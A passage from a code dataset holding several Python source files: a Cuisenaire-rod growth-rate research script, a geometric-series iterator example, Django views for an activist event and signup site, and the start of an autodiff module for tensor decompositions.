coeffs.append(-b)\n coeffs.append(-1) \n coeffs.reverse()\n return coeffs\n\n# This function is no longer called. The growth rate is\n# the largest root of the Cuisenaire polynomial.\ndef xgrowthrate(d):\n ''' Calculate the growth rate for total solutions\n for the puzzle problem R(d). Here d is the \n bit string specifying which C_k are allowed, \n or that bit string as a plug number, \n or a list [a,b,...] of positions of 1 bits.\n The algorithm pads with lots of 0s to stabilize growth.\n Adjusts when gcd of plug lengths > 1.\n '''\n if isinstance(d, str): # d is a bitstring like \"101\"\n xd = bitstring2bits(d)\n elif isinstance(d, int): # convert integer d to binary\n xd = [int(i) for i in bin(d)[2:]]\n elif isinstance(d, list):\n xd = spots2bits(d)\n else:\n print(f\"type error {d}\")\n return\n spots = bits2spots(xd)\n gcd = mygcd(spots)\n spotsum = sum(spots)\n expand = 300\n lookat = expand*gcd\n zeros = 2*lookat\n goodspot = spotsum + lookat - 1\n xd.extend([0]*zeros)\n totals = p2t(xd)\n rate = (totals[goodspot + gcd]/totals[goodspot])**(1/gcd)\n return(rate)\n\ndef growthrate(rods):\n coeffs = build_cuisenaire_poly_coefficients(rods)\n r1 = poly.polyroots(coeffs)\n# maxroot = np.round(np.abs(max(r1)),10)\n maxroot = np.abs(max(r1))\n return maxroot\n \ndef rodsetattributes(input):\n ''' Create dictionary of attributes the input rod set.\n Rod set should really be an object.\n '''\n# if isinstance(input, str): # d is a bitstring like \"101\"\n# bits = input\n# elif isinstance(input, list):\n# bits = spots2bitstring(input)\n# else:\n# print(f\"type error {input}\")\n# return\n data = {}\n mypoly = build_recursion_polynomial(input)\n fpoly = factor(mypoly)\n coeffs = build_cuisenaire_poly_coefficients(input) \n# print(\"xxx mypoly\", mypoly)\n# print(\"xxx fpoly\", fpoly)\n# print(\"xxx\", coeffs)\n r1 = poly.polyroots(coeffs)\n maxroot = np.round(max(np.abs(r1)),10)\n theroots = list(np.round(np.abs(r1),3))\n rootlengths = list(set(theroots)) \n fpolystr = str(fpoly)\n fpolystr = fpolystr.replace(\"**\",\"^\").replace(\"*\",\"\").replace(\"^1 \",\"\").replace(\"1x\",\"x\") \n mypolystr = str(mypoly)\n mypolystr = mypolystr.replace(\"**\",\"^\").replace(\"*\",\"\").replace(\"^1 \",\"\").replace(\"1x\",\"x\").replace(\"^1-\",\"-\")\n# data.update({\"bits\":bits})\n data.update({\"spots\":input})\n data.update({\"growthrate\":maxroot})\n data.update({\"cpoly\":mypolystr})\n data.update({\"factors\":fpolystr})\n# data.update({\"roots\":theroots})\n data.update({\"rootlengths\":rootlengths}) \n return data\n\n# should rewrite this function to call rodsetattributes(input)\ndef csvout(input):\n ''' Print string with data about the input (bit string or rod set)\n suitable for spreadsheet input. \n Use '@' rather than a comma as the delimiter.\n '''\n if isinstance(input, str): # d is a bitstring like \"101\"\n bits = input\n elif isinstance(input, list):\n bits = spots2bitstring(input)\n else:\n print(f\"type error {input}\")\n return\n mypoly = build_recursion_polynomial(input)\n fpoly = factor(mypoly)\n coeffs = build_cuisenaire_poly_coefficients(input)\n r1 = poly.polyroots(coeffs)\n maxroot = np.round(np.abs(max(r1)),10)\n theroots = list(np.round(np.abs(r1),3))\n print(f\"{bits}@ {input}@ {maxroot}@ {mypoly}@ {fpoly} @ {theroots}\")\n return\n\ncsvheader=\"d@ spots@ growth rate@ poly@ factored@ |roots|\" \n\ndef growthratecsv(N):\n ''' Print spreadsheet input for odd plug numbers up to 2**N\n and for those numbers with prefixes 0, 00, 000 and 0000\n '''\n print(csvheader)\n for d in range(1, 1+2**N,2):\n todo = [bin(d)[2:], bin(2*d)[2:][::-1], bin(4*d)[2:][::-1],\n bin(8*d)[2:][::-1], bin(16*d)[2:][::-1] \n ]\n for bits in todo:\n csvout(bits)\n return\n\n# from //www.geeksforgeeks.org/itertools-combinations-module-python-print-possible-combinations/\ndef rSubset(arr, r):\n # return list of all subsets of length r\n # to deal with duplicate subsets use \n # set(list(combinations(arr, r)))\n return list(combinations(arr, r))\n\n# This should be refactored to call rodcount(limit, count)\ndef rodcountcsv( limit, count):\n ''' Print spreadsheet input for all cuisenaire rod sets of \n length up to limit using at most count rods\n '''\n# print(f\"count {count} limit {limit}\")\n print(csvheader)\n possibles = list(range(limit+1)[1:])\n counts = list(range(count+1))[1:]\n for j in counts:\n spotsets = rSubset( possibles, j)\n for spots in spotsets:\n csvout(list(spots))\n return \n\n# yyyyyyyyyy\ndef build_cuisenaire_poly_coefficients(rods):\n# degree = rods[len(rods)-1] # last entry\n# degree = max(rods)\n degree = max(max(rods),-min(rods))\n if degree==max(rods):\n globalsign = 1\n else:\n globalsign = -1\n coeffs = [0]*(degree+1)\n for r in rods:\n# print(r, sign(r)) \n# coeffs[degree-abs(r)] += -1\n coeffs[degree-abs(r)] -= sign(r)*globalsign\n# print(r, sign(r))\n coeffs[degree] = 1\n# print(coeffs)\n return coeffs\n\ndef get_cuisenaire_poly_roots(rods):\n coeffs = build_cuisenaire_poly_coefficients(rods)\n return np.array(poly.polyroots(coeffs))\n\ndef plotroots(rods):\n # plot the roots \n data = get_cuisenaire_poly_roots(rods)\n x = data.real\n y = data.imag\n\n # plot the circle through the largest root\n r = growthrate(rods);\n theta = np.linspace(0, 2*np.pi, 100)\n x1 = r*np.cos(theta)\n x2 = r*np.sin(theta)\n\n fig, ax = plt.subplots(1)\n ax.plot(x, y, 'b*')\n plt.xlabel(str(rods))\n ax.plot(x1, x2,'r')\n ax.set_aspect(1)\n plt.xlim(-2,2)\n plt.ylim(-2,2)\n\n plt.show() \n \ndef checkAP(spots, m):\n print(f\"{spots} + {m}k\")\n max = 80\n equiv = spots + list([m])\n equiv.sort()\n long = spots.copy()\n for r in spots:\n nextr = r+m\n while nextr < max:\n long.append(nextr)\n nextr += m\n long.sort()\n print(f\"{long} {growthrate(long)}\")\n print(f\"{equiv} {growthrate(equiv)}\")\n\ndef xfindfamilies( limit, count):\n ''' Collect cuisenaire rod sets of \n length up to limit using at most count rods\n into families keyed by growthrate.\n '''\n families = {} \n# print(f\"count {count} limit {limit}\")\n possibles = list(range(limit+1)[1:])\n counts = list(range(count+1))[1:]\n for j in counts:\n spotsets = rSubset( possibles, j)\n for spots in spotsets:\n if mygcd(spots) > 1:\n break\n attributes = rodsetattributes(list(spots))\n key = attributes.get(\"growthrate\")\n if families.get(key) == None:\n families[key] = [list(attributes[\"spots\"])]\n else:\n families[key].append(list(attributes[\"spots\"]))\n return families\n\ndef findfamilies( length, count):\n ''' Collect cuisenaire rod sets of \n length up to length using at most count rods\n into families keyed by growthrate.\n '''\n families = {}\n spotsetattributes = rodcountmultisets(length, count )\n for spots in spotsetattributes:\n \n# if len(spots['bits']) == 1:\n# continue\n key = spots.get(\"growthrate\")\n# print(key)\n if families.get(key) == None:\n# families[key] = spots\n families[key] = []\n families[key].append(spots)\n return families\n\n# zzzzzzzzzz\ndef rodcountmultisets( length, limit):\n ''' Create list of attributes for all cuisenaire rod multisets of \n length up to limit using at most count rods\n '''\n rodcounts = []\n spotsets = multi(length, limit)\n for spots in spotsets:\n if len(spots) == 1:\n continue\n# if mygcd(spots) > 1:\n# continue\n attributes = rodsetattributes(list(spots))\n rodcounts.append(attributes)\n return rodcounts\n\ndef rodcount( limit, count):\n ''' Create list of attributes for all cuisenaire rod sets of \n length up to limit using at most count rods\n '''\n rodcounts = []\n possibles = list(range(limit+1)[1:])\n counts = list(range(count+1))[1:]\n for j in counts:\n spotsets = rSubset( possibles, j)\n for spots in spotsets:\n# if mygcd(spots) > 1:\n# continue\n attributes = rodsetattributes(list(spots))\n rodcounts.append(attributes)\n return rodcounts\n\n\ndef findrodsfor(target, epsilon, rods=None):\n# print(f\"target {target} epsilon {epsilon} start {rods}\")\n if rods is None:\n rods = [1] \n g = growthrate(rods)\n if g > target:\n print(\"target smaller than start\")\n return rods\n while np.abs(target-g) > epsilon:\n while g < target:\n rods.append(rods[-1])\n g = growthrate(rods) \n rods[-1] = 1+rods[-1]\n g = growthrate(rods) \n# print(f\"{rods} {g}\")\n return(rods)\n\ndef findrodsclassicfor(target, epsilon):\n# print(f\"{target} {epsilon}\")\n rods = [1]\n g = growthrate(rods)\n print(f\"{rods} {g}\") \n while np.abs(target-g) > epsilon:\n rods.append(1+rods[-1])\n g = growthrate(rods)\n# print(f\"{rods} {g}\") \n while g > target:\n rods[-1] = 1+rods[-1]\n g = growthrate(rods)\n return(rods)\n\ndef hasduplicates(listOfElems, skipstart= 0):\n ''' Check if given list contains any duplicates \n ignoring first skipstart items\n '''\n return not len(listOfElems[skipstart:]) == len(set(listOfElems[skipstart:]))\n\ndef compareg(rods, extra):\n g = growthrate(rods)\n rods.append(extra)\n gx = growthrate(rods)\n return rods, extra, gx-g\n\ndef buildtree(rods, level):\n ''' find rod sets in the tree build by expanding\n the rods in R by R\n '''\n tree = [[rods]]\n for i in range(level):\n nextlevel =[]\n for rodset in tree[i]:\n for r in rodset:\n next = rodset.copy()\n next.remove(r)\n for s in rods:\n next.append(r+s)\n next.sort()\n nextlevel.append(next)\n tree.append(nextlevel)\n return tree\n\n\ndef commonexpansion(rods1, rods2, depth):\n from itertools import chain \n t1 = buildtree(rods1, depth);\n t2 = buildtree(rods2, depth);\n f1 = list(chain(*t1))\n f2 = list(chain(*t2)) \n return [value for value in f1 if value in f2] \n\ndef cpolyisminimal(rods):\n data = rodsetattributes(rods)\n return not \"(\" in data.get(\"factors\")\n\ndef getrandomrodset(length, candidates):\n rods = length*[0]\n for i in range(length):\n rods[-i] = random.choice(candidates)\n return list(sort(rods))\n\ndef countminimalcpolys(count, length, rodrange):\n ''' find the proportion of rod sets with minimal cpoly\n in a random selection of count rod sets of given length\n with elemens chosen from rodrange.\n '''\n minimalcount = 0\n for i in range(count):\n rods = getrandomrodset(length, rodrange)\n# print(i,rods)\n if cpolyisminimal(rods):\n minimalcount += 1\n# else:\n# print(rodsetattributes(rods))\n return minimalcount/count\n \n### code to execute here\nif __name__ == \"__main__\":\n\n## default:\n## Print details about rod set from command line\n \n if len(sys.argv) > 1: \n rodset = list(map(int, sys.argv[1:]))\n print(rodsetattributes( rodset))\n plotroots(rodset)\n\n\n## Print families with at least two members\n# Separator '@' instead of ',' smooths spreadsheet import from\n# csv file that's really now @sv\n# \n# families = findfamilies(3,4)\n# for f in families.values():\n# if len(f) > 2:\n# print(f\"{f[0]['growthrate']}\")\n# for i in range(len(f)):\n# cpoly = str(f[i]['cpoly'])\n# factors = str(f[i]['factors'])\n# print(f\"@{f[i]['spots']}@{cpoly}@{factors}\")\n\n\n##\n# print(\"countminimalcpolys(count=100, length=10, rodrange=range(1,n))\")\n# for n in range(10,100,5):\n# print(n, countminimalcpolys(count=100, length=10, rodrange=range(1,n)))\n# \n # rods = [1,2]\n# print(rods, cpolyisminimal(rods))\n# rods = [1,5]\n# print(rods, cpolyisminimal(rods))\n\n## Print the intersection of the trees from two rod sets\n# print(commonexpansion([1,3,3],[1,3,4,6,6],2))\n\n\n## Print the tree of expansions of a rod set to specified depth \n# rods = [2,3] \n# tree23 = buildtree(rods,3)\n# for level in tree23:\n# print(level)\n\n## Print the growthrate for a rod set\n# print(growthrate([1,3,4]))\n\n## Print the start of infinite rod set for a given growthrate\n# to specified precision with optional beginning\n# rate = growthrate([3,4])\n# eps = 0.0000001\n# print(findrodsfor(rate, eps))\n# print(findrodsfor(rate, eps, rods=[2]))\n# print(findrodsfor(rate, eps, [3])) \n\n######################################################################\n# \n# Only special purpose code from here on\n# \n# print(f\"{growthrate([1,10,20])}\")\n# print(f\"{growthrate([1,10,10,20])}\") \n# print(compareg([1,10,20], 10)) \n\n# check to see if we ever get nonclassic rod sets\n# start = 1.1\n# step = 0.001\n# epsilon = 0.00000001\n# count = 10\n# for i in range(count):\n# rate = start + i*step\n# rods = findrodsfor(rate, epsilon)\n# print(rods)\n# if hasduplicates(rods):\n# print(rate, rods)\n\n# eps = 0.00000001\n# rate = 1.6\n# print(findrodsfor(rate, eps))\n# print(findrodsfor(rate, eps, rods=[2]))\n# print(findrodsfor(rate, eps, rods=[3]))\n# print(findrodsfor(rate, eps, rods=[4]))\n# print(findrodsfor(rate, eps, rods=[2,5])) \n \n# print(hasduplicates([1,2,3]))\n# print(hasduplicates([1,2,2])) \n# print(findrodsfor(rate, eps,[2])) \n# print(findrodsfor(rate, eps,[3]))\n# print(findrodsfor(rate, eps,[4])) \n# print(findrodsclassicfor(rate,eps))\n\n \n# rods=[1]\n# for j in range(100):\n# rods.append\n# print(f\"{growthrate(rods)}\")\n\n \n# findrodsfor(3.5, 0.00000001)\n# findrodsfor(sqrt(2), 0.00000001)\n\n# families = findfamilies(2,50)\n# for f in families.values():\n# if len(f) > 1:\n# print()\n\n# put families into latex table\n# families = findfamilies(6,10)\n# for f in families.values():\n# if len(f) > 4:\n# print()\n# print(\"\\\\documentclass{standalone}\")\n# print(\"\\\\begin{document}\")\n# print()\n# print(\"\\\\begin{tabular}{llllllllllllllllllll}\")\n# allspots = list(f[i]['spots'] for i in range(len(f)))\n# allspots.sort(key=max)\n# allspots.sort(key=len) \n# row = len(allspots[0])\n# count = 0 \n# for spots in allspots:\n# if row != len(spots):\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\") \n# row = len(spots)\n# count = 0\n# if count > 7:\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\") \n# print(\"\", end=\"\")\n# count = 0\n# count += 1\n# print(\"$\"+str(spots).replace(\" \",\"\"), end=\"$ & \")\n# print()\n# print(\"\\\\end{tabular}\")\n# print(\"\\\\end{document}\") \n# testing sorting\n# ll = [[1, 6, 10],[1, 7, 8],[2, 4, 8],[2, 5, 6],[3, 3, 7],[3, 4, 5]]\n# print(ll)\n# ll.sort()\n# print(ll) \n# ll.sort(key=max)\n# print(ll) \n\n# families = findfamilies(3,3)\n# for f in families.values():\n# if len(f) > 1:\n# print(f\"{f[0]['growthrate']}\")\n# for i in range(len(f)):\n# cpoly = str(f[i]['cpoly']).replace(\"**\",\"^\")\n# cpoly = cpoly.replace(\"*\",\"\")\n# cpoly = cpoly.replace(\"^1\",\"\") \n# factors = str(f[i]['factors']).replace(\"**\",\"^\")\n# factors = factors.replace(\"*\",\"\")\n# factors = factors.replace(\"^1\",\"\") \n# print(f\"@{f[i]['spots']}@{cpoly}@{factors}\")\n\n\n# print\n\n# csvout([1,3])\n# csvout([3,5,5,5,6,7,7])\n# csvout([1,2,2,2,4])\n# print(rodsetattributes([1,2,2,2,4]))\n# csvout([1,3,4])\n# print(rodsetattributes([1,3,4]))\n \n# find all rod sets of length 2, extract growthrate and rods for excel\n# data = rodcount(40,2)\n# for spots in data:\n# if len(spots[\"spots\"]) == 2:\n# print(f\"{spots['spots']}@{spots['spots'][0]}@{spots['spots'][1]}@ {spots['growthrate']} \")\n \n","repo_name":"ktllee/plug_problem","sub_path":"cuisenaire/Ethan/cuisenaire.py","file_name":"cuisenaire.py","file_ext":"py","file_size_in_byte":19524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18323926243","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : 等比数列.py\n# @Author: Lizi\n# @Date : 2020/12/23\n\n\nclass Geometric_series_based_iterator:\n def __init__(self, first=0, step=1, sequence_count=10):\n self._first = first\n self._step = step\n self._sequence_counter = sequence_count\n self._index = 0\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self._index < self._sequence_counter:\n res = self._first * (self._step ** self._index)\n self._index += 1\n return res\n else:\n raise StopIteration\n\n\ndef geometric_series_based_generator(first=0, step=1, sequence_count=10):\n \"\"\"基生生成器函数的等差数列,与上面的代码功能完全相同\"\"\"\n for index in range(0, sequence_count):\n res = first * step ** index\n yield res\n index += 1\n\n\nif __name__ == '__main__':\n interator = Geometric_series_based_iterator(first=1, step=2, sequence_count=10)\n print(\"基于迭代器的等比数列的结果:\")\n for num in interator:\n print(num, end=' ')\n\n print(' ')\n\n generator = geometric_series_based_generator(first=1, step=2, sequence_count=10)\n print(\"基于生成器的等比数列的结果:\")\n for num in generator:\n print(num, end=' ')\n","repo_name":"rage-vampire/Python","sub_path":"lizi_project/built_in_function/iter+generaotr/等比数列.py","file_name":"等比数列.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74453147369","text":"import calendar\nimport csv\n\nfrom collections import defaultdict\nfrom datetime import timedelta, datetime\nfrom dateutil import tz\nfrom urllib.parse import urlencode\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.core import signing\nfrom django.db import IntegrityError\nfrom django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils.html import strip_tags\nfrom django.utils.http import http_date\nfrom django.utils.timezone import now\nfrom django.urls import reverse\nfrom django.views.decorators.cache import never_cache, cache_page\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_protect\n\nfrom django import forms\nfrom phonenumber_field.formfields import PhoneNumberField\n\nfrom extinctionr.utils import get_last_contact, set_last_contact, get_contact\nfrom .models import Action, ActionRole, Attendee, TalkProposal\nfrom .comm import notify_commitments\n\n\nBOOTSTRAP_ATTRS = {'class': 'form-control text-center'}\n\nclass ActionForm(forms.ModelForm):\n class Meta:\n model = Action\n fields = ('name', 'when', 'description', 'public', 'location', 'tags', 'slug', 'accessibility')\n\n\nclass SignupForm(forms.Form):\n email = forms.EmailField(label=\"Email\", required=True, widget=forms.EmailInput(attrs={'class': 'form-control text-center', 'placeholder': 'Email Address'}))\n name = forms.CharField(label=\"Your name\", widget=forms.TextInput(attrs={'class': 'form-control text-center', 'placeholder': 'Your Name'}))\n promised = forms.BooleanField(required=False, widget=forms.CheckboxInput(attrs={'class': 'form-check'}))\n role = forms.ModelChoiceField(queryset=None, required=False, widget=forms.Select(attrs=BOOTSTRAP_ATTRS))\n next = forms.CharField(required=False, widget=forms.HiddenInput())\n notes = forms.CharField(required=False, initial='')\n commit = forms.IntegerField(required=False, initial=0, widget=forms.NumberInput(attrs={'class': 'form-control text-center', 'min': 0, 'max': 1000}))\n\n def __init__(self, *args, **kwargs):\n self.action = kwargs.pop('action')\n super().__init__(*args, **kwargs)\n self.fields['role'].queryset = qset = ActionRole.objects.filter(name__in=self.action.available_role_choices)\n if qset:\n self.fields['role'].required = True\n\n\nclass TalkProposalForm(forms.Form):\n location = forms.CharField(widget=forms.Textarea(attrs={'rows': 4, 'class': 'form-control', 'placeholder': 'Your location'}))\n name = forms.CharField(label=\"Your name\", required=True, widget=forms.TextInput(attrs={'class': 'form-control text-center', 'placeholder': 'Your Name'}))\n email = forms.EmailField(label=\"Email\", required=True, widget=forms.EmailInput(attrs={'class': 'form-control text-center', 'placeholder': 'Email Address'}))\n phone = PhoneNumberField(label=\"Phone Number\", required=False, widget=forms.TextInput(attrs={'class': 'form-control text-center', 'placeholder': 'Phone Number'}))\n\n\ndef _get_actions(request, whatever='', include_future=True, include_past=7):\n token = request.GET.get('token', '')\n req_date = request.GET.get('month','')\n tag_filter = request.GET.get('tag', '')\n context = {}\n today = now().date()\n current_date = today.replace(day=1)\n if token:\n try:\n user_id = signing.Signer().unsign(token)\n except signing.BadSignature:\n return HttpResponse(status=403)\n else:\n user = get_user_model().objects.get(pk=user_id)\n else:\n user = request.user\n actions = Action.objects.for_user(user)\n if whatever.isdigit():\n actions = actions.filter(pk=int(whatever))\n else:\n if req_date:\n current_date = datetime.strptime(req_date, '%Y-%m')\n context['is_cal'] = True\n start_date = current_date - timedelta(days=include_past)\n if not include_future:\n end_date = start_date + timedelta(days=38)\n else:\n end_date = start_date + timedelta(days=3650)\n actions = actions.filter(when__date__range=(start_date, end_date))\n if tag_filter:\n actions = actions.filter(tags__name=tag_filter)\n context['current_tag'] = tag_filter\n context['is_cal'] = True\n context['current_date'] = current_date\n context['today'] = today\n return actions, context\n\n\ndef calendar_view(request, whatever):\n from ics import Calendar, Event\n actions, ctx = _get_actions(request, include_future=True, include_past=30)\n thecal = Calendar()\n thecal.creator = 'XR Mass Events'\n for action in actions:\n evt = Event()\n evt.uid = '{}@{}'.format(action.id, request.get_host())\n evt.name = action.html_title\n evt.description = action.description\n evt.categories = action.tags.names()\n evt.last_modified = action.modified\n evt.url = request.build_absolute_uri(action.get_absolute_url())\n evt.begin = action.when\n evt.duration = timedelta(hours=1)\n # evt.end = action.when + timedelta(hours=1)\n evt.location = action.location\n thecal.events.add(evt)\n response = HttpResponse(thecal, content_type='text/calendar')\n return response\n\n\n@cache_page(1200)\n@csrf_protect\ndef list_actions(request):\n can_add = request.user.has_perm('actions.add_action')\n if request.method == 'POST' and can_add:\n form = ActionForm(request.POST)\n if form.is_valid():\n action = form.save()\n return redirect(action.get_absolute_url())\n else:\n print(form.errors)\n\n qset, ctx = _get_actions(request, include_future=False)\n if not ctx.get('is_cal'):\n actions = Action.objects.for_user(request.user).filter(when__gte=now())\n ctx['upcoming'] = actions[:6]\n else:\n actions = None\n current_date = ctx['current_date']\n ctx['next_month'] = current_date + timedelta(days=31)\n ctx['last_month'] = current_date + timedelta(days=-1)\n\n cal_days = list(calendar.Calendar(firstweekday=6).itermonthdates(current_date.year, current_date.month))\n this_month = []\n this_week = []\n month_actions = defaultdict(list)\n\n for action in qset:\n # Convert day to local day so actions land in the right day for current view.\n day = action.when.astimezone(tz.tzlocal()).date()\n month_actions[day].append(action)\n\n event_colors = {\n 'talk': 'xr-bg-pink',\n 'action': 'xr-bg-green',\n 'ally': 'xr-bg-light-green',\n 'meeting': 'xr-bg-lemon',\n 'orientation': 'xr-bg-purple',\n 'art': 'xr-bg-warm-yellow',\n 'nvda': 'xr-bg-light-blue',\n 'regen': 'xr-warm-yellow xr-bg-dark-blue',\n }\n for daynum, mdate in enumerate(cal_days, 1):\n todays_actions = month_actions[mdate]\n obj = {\n 'day': mdate,\n 'events': todays_actions,\n 'bg': '',\n }\n if mdate.month == current_date.month:\n for a in todays_actions:\n tagnames = a.tags.names()\n for t in a.tags.names():\n color = event_colors.get(t, None)\n if color:\n obj['bg'] = color\n break\n else:\n # previous month\n obj['bg'] = 'bg-light'\n if mdate == ctx['today']:\n obj['today'] = True\n this_week.append(obj)\n if daynum % 7 == 0:\n this_month.append(this_week)\n this_week = []\n if this_week:\n this_month.append(this_week)\n ctx['month'] = this_month\n ctx['can_add'] = can_add\n if ctx['can_add']:\n ctx['form'] = ActionForm()\n calendar_link = 'webcal://{}/action/ical/XR%20Mass%20Events'.format(request.get_host())\n link_pars = {}\n if request.user.is_authenticated:\n link_pars['token'] = signing.Signer().sign(request.user.id)\n if ctx.get('current_tag'):\n link_pars['tag'] = ctx.get('current_tag')\n ctx['calendar_link'] = calendar_link + '?' + urlencode(link_pars)\n resp = render(request, 'list_actions.html', ctx)\n resp['Vary'] = 'Cookie'\n\n if request.user.is_authenticated:\n resp['Cache-Control'] = 'private'\n if actions:\n resp['Last-Modified'] = http_date(actions.last().when.timestamp())\n return resp\n\n\n\n@cache_page(1200)\ndef show_action(request, slug):\n action = get_object_or_404(Action, slug=slug)\n ctx = {'action': action}\n if request.user.is_authenticated:\n ctx['attendees'] = Attendee.objects.filter(action=action).select_related('contact').order_by('-mutual_commitment', '-promised', 'pk')\n ctx['promised'] = ctx['attendees'].filter(promised__isnull=False)\n ctx['default_to_email'] = settings.DEFAULT_FROM_EMAIL\n if action.when < now() and action.public:\n # don't allow signups for public actions that already happened\n ctx['already_happened'] = True\n form = None\n elif request.method == 'POST':\n form = SignupForm(request.POST, action=action)\n if form.is_valid():\n data = form.cleaned_data\n commit = abs(data['commit'] or 0)\n atten = action.signup(data['email'],\n data['role'],\n name=data['name'][:100],\n promised=data['promised'],\n commit=commit,\n notes=data['notes'])\n next_url = data['next'] or request.headers.get('referer', '/')\n messages.success(request, \"Thank you for signing up for {}!\".format(action.html_title))\n if commit:\n messages.info(request, \"We will notify you once at least %d others commit\" % commit)\n set_last_contact(request, atten.contact)\n return redirect(next_url)\n else:\n contact = get_contact(email=request.user.email) if request.user.is_authenticated else get_last_contact(request)\n initial = {}\n if contact:\n initial['email'] = contact.email\n initial['name'] = str(contact)\n form = SignupForm(action=action, initial=initial)\n ctx['form'] = form\n ctx['has_roles'] = list(action.available_role_choices)\n ctx['photos'] = list(action.photos.all())\n resp = render(request, 'action.html', ctx)\n resp['Vary'] = 'Cookie'\n resp['Last-Modified'] = http_date(action.modified.timestamp())\n if request.user.is_authenticated:\n resp['Cache-Control'] = 'private'\n return resp\n\n\n@never_cache\ndef show_attendees(request, action_slug):\n action = get_object_or_404(Action, slug=action_slug)\n out_fmt = request.GET.get('fmt', 'json')\n attendees = Attendee.objects.filter(action=action).select_related('contact').order_by('contact__last_name')\n num = attendees.count()\n if num > 10:\n half = int(num / 2)\n else:\n half = None\n if out_fmt == 'html':\n resp = HttpResponse('not allowed')\n\n # ctx = {'attendees': attendees, 'half': half, 'can_change': request.user.is_staff, 'slug': action_slug}\n # resp = render(request, 'attendees.html', ctx)\n elif out_fmt == 'csv' and request.user.has_perm('actions.view_attendee'):\n attendees = attendees.order_by('created')\n resp = HttpResponse()\n resp['Content-Type'] = 'text/csv'\n csv_writer = csv.writer(resp)\n header = ('Email', 'First Name', 'Last Name', 'Phone', 'Promised', 'Created')\n csv_writer.writerow(header)\n for attendee in attendees:\n csv_writer.writerow((attendee.contact.email, attendee.contact.first_name, attendee.contact.last_name, attendee.contact.phone, attendee.promised, attendee.created.isoformat()))\n return resp\n\n\n@login_required\ndef send_notifications(request, action_slug):\n action = get_object_or_404(Action, slug=action_slug)\n if request.method == 'POST':\n threshold = int(request.POST['threshold'])\n action_url = request.build_absolute_uri(reverse('actions:action', kwargs={'slug': action_slug}))\n num = notify_commitments(action, threshold, action_url)\n if num:\n messages.success(request, 'Notified %d attendees of their commitment!' % num)\n return redirect(action.get_absolute_url())\n\n\ndef propose_talk(request):\n ctx = {}\n if request.method == 'POST':\n form = TalkProposalForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n prop = TalkProposal.objects.propose(\n strip_tags(data['location']),\n data['email'],\n phone=data['phone'],\n name=data['name'])\n ctx['created'] = prop\n messages.success(request, 'Thank you, {}!'.format(prop.requestor))\n messages.info(request, 'Somebody from Extinction Rebellion will contact you soon to arrange a talk at {}'.format(prop.location))\n set_last_contact(request, prop.requestor)\n return redirect(reverse('extinctionr.actions:talk-proposal'))\n else:\n contact = get_last_contact(request)\n initial = {}\n if contact:\n initial['email'] = contact.email\n initial['name'] = str(contact)\n initial['phone'] = contact.phone\n form = TalkProposalForm(initial=initial)\n ctx['form'] = form\n return render(request, 'talkproposal.html', ctx)\n\n\n@login_required\ndef mark_promised(request, action_slug):\n if request.user.has_perm('action.change_attendee'):\n attendee = get_object_or_404(Attendee, pk=request.POST['id'], action__slug=action_slug)\n if not attendee.promised:\n attendee.promised = now()\n attendee.save()\n return JsonResponse({'status': 'ok'})\n\n\n@login_required\n@never_cache\ndef list_proposals(request):\n ctx = {\n 'talks': TalkProposal.objects.select_related('requestor').order_by('-responded', 'created')\n }\n template = 'list_talks'\n if request.GET.get('format', 'html') == 'csv':\n template += '.csv'\n content_type = 'text/csv'\n content_disposition = 'attachment; filename=\"talks.csv\"'\n else:\n template += '.html'\n content_type = 'text/html'\n content_disposition = None\n response = render(request, template, ctx)\n response['content-type'] = content_type\n if content_disposition:\n response['content-disposition'] = content_disposition\n return response\n\n\n\n@login_required\n@never_cache\ndef talk_respond(request, talk_id):\n talk = get_object_or_404(TalkProposal, pk=talk_id)\n if request.method == 'POST' and not talk.responded:\n talk.responded = now()\n talk.responder = request.user\n talk.save()\n return JsonResponse({'id': talk.id})\n\n\n@login_required\n@never_cache\ndef convert_proposal_to_action(request, talk_id):\n talk = get_object_or_404(TalkProposal, pk=talk_id)\n if request.method == 'POST' and talk.responded:\n act = Action()\n act.name = \"XR Talk at {}\".format(talk.location.strip())\n act.when = now() + timedelta(days=7)\n act.public = False\n act.description = '''Heading to extinction (and what to do about it)\n\nThis talk will be at {}\n'''.format(talk.location)\n act.slug = 'xr-talk-%d' % talk.id\n try:\n act.save()\n except IntegrityError:\n act = Action.objects.get(slug=act.slug)\n url = '/admin/actions/action/%d/change/' % act.id\n return JsonResponse({'next': url})\n\n","repo_name":"davestgermain/extinctionr","sub_path":"extinctionr/actions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11175081838","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport tadpole.util as util\nimport tadpole.autodiff as ad\nimport tadpole.tensor as tn\n\nimport tadpole.linalg.unwrapped as la\n\nfrom tadpole.index import (\n Index,\n IndexGen, \n IndexLit,\n Indices,\n)\n\n\n\n\n###############################################################################\n### ###\n### VJP's of tensor decompositions ###\n### ###\n###############################################################################\n\n\n# --- Helpers: identity matrix ---------------------------------------------- #\n\ndef eye(x, inds=None): \n\n if inds is None:\n return tn.space(x).eye()\n\n sind = IndexLit(inds[0], x.shape[0])\n sind1 = IndexLit(inds[1], x.shape[-1])\n\n return tn.space(x).eye(sind, sind1)\n\n\n\n\n# --- Helpers: F-matrix ----------------------------------------------------- #\n\ndef fmatrix(s): \n\n seye = eye(s,\"ij\")\n sdiff = s(\"1j\") - s(\"i1\") + seye\n\n return sdiff / (sdiff**2 + 1e-12) - seye\n\n\n\n\n# --- SVD ------------------------------------------------------------------- #\n\ndef vjp_svd(g, out, x, sind=None, trunc=None):\n\n \"\"\"\n 